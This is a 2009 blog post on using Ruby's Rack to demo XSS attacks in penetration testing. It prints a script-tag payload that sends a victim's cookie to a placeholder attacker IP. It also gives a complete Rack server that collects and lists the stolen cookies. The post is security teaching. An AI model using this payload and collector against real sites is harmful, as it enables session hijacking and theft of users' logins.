Rack for Pen Testing

By Rory2 on March 31, 2009 8:37 PM | No Comments | No TrackBacks

One of the many things I got introduced to at Scotland on Rails was the Rack project. Designed to help create flexible web application deployments, it creates an interface between webservers and ruby web app. frameworks (rails, sinatra etc).

Reading some of the examples, it occurred to me that Rack could be pretty handy for web application testing where sometimes it's useful to have a minimal web application to bounce things off.

One example of this is demo'ing XSS attacks. A standard XSS attack is cookie stealing. The way this works is the attacker inserts a script tag with a reference to a URL controlled by the attacker and inserts the cookie for the victim site into a parameter to the URL.

So for example if we've found an XSS vector we can put

<script>document.location="http://<attacker_ip/cookiegrabber?cookie="+document.cookie</script>
into the vulnerable box and if we have a server listening on that IP address we get the cookie..

Here's where rack comes in. You can use rack to very quickly create some code to listen on a port and accept the incoming request (and indeed to anything else you can do with ruby, but hey lets start small).

A proof of concept script to do something like this might look like the one below...

#!/usr/bin/env ruby
require 'rubygems'
require 'rack'
builder = Rack::Builder.new do
  use Rack::CommonLogger
  @@grabbed = Array.new
  map '/' do
    run Proc.new {|env| [200, {"Content-Type" => "text/html"}, "<h1> Rack Pen Test Helper</h1>"]}
  end
  
  map '/cookiegrabber' do
    app = proc do |env|
      req = Rack::Request.new(env) 
      ip = req.ip.to_s
      cookie = req.params['cookie'] || "No Cookie Parameter passed"
      @@grabbed << [ip,cookie]
      [200, {"Content-Type" => "text/html"}, "grabbed " + cookie + " from " + ip + "<br /> Grabbed " + @@grabbed.length.to_s + " cookies so far"]
    end
    run app
  end
  
  map '/cookiegrabbed' do
    app = proc do |env|
      out = ""
      if @@grabbed.length > 0
        @@grabbed.each do |crumb|
          out << "Grabbed a cookie with value  " + crumb[1] + " from " + crumb[0] + "<br />"
        end
      else
        out = "Nothing Grabbed so far"
      end
      [200, {"Content-Type" => "text/html"}, out]
    end
    run app
  end
end
Rack::Handler::Mongrel.run builder, :Port => 9292

Categories:

No TrackBacks

TrackBack URL: http://www.mccune.org.uk/blog/rm-mt-tb.cgi/332

Leave a comment

Categories

Monthly Archives

Pages

Powered by Movable Type 4.32-en

Search

About this Entry

This page contains a single entry by Rory2 published on March 31, 2009 8:37 PM.

Scotland on Rails - Web Application Security was the previous entry in this blog.

Metasploit Resources is the next entry in this blog.

Find recent content on the main index or look in the archives to find all content.